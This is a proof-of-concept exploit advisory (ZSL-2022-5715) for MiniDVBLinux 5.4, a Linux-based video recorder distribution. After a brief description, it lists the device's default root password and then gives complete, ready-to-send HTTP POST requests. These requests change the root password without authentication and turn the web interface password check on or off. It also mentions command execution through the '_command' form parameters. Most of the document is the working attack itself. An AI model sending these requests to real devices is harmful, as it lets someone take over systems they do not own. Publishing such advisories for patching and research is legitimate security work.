# Exploit Title: MiniDVBLinux 5.4 - Change Root Password
# Exploit Author: LiquidWorm
MiniDVBLinux 5.4 Change Root Password PoC
Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.
Desc: The application allows a remote attacker to change the root
password of the system without authentication (disabled by default)
and verification of previously assigned credential. Command execution
also possible using several POST parameters.
Tested on: MiniDVBLinux 5.4
BusyBox v1.25.1
Architecture: armhf, armhf-rpi2
GNU/Linux 4.19.127.203 (armv7l)
VideoDiskRecorder 2.4.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5715
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php
24.09.2022
--
Default root password: mld500
Change system password:
-----------------------
POST /?site=setup§ion=System HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 778
Content-Type: application/x-www-form-urlencoded
Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba
Host: ip:8008
Origin: http://ip:8008
Referer: http://ip:8008/?site=setup§ion=System
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
sec-gpc: 1
APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save¶ms=&changed=SYSTEM_PASSWORD+
Pretty post data:
APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD: r00t
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Kumanovo
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
action: save
params:
changed: SYSTEM_PASSWORD
Eenable webif password check:
-----------------------------
POST /?site=setup§ion=System HTTP/1.1
APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD:
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Berlin
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
WEBIF_PASSWORD_CHECK: 1
action: save
params:
changed: WEBIF_PASSWORD_CHECK
Disable webif password check:
-----------------------------
POST /?site=setup§ion=System HTTP/1.1
APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD:
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Berlin
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
action: save
params:
changed: WEBIF_PASSWORD_CHECK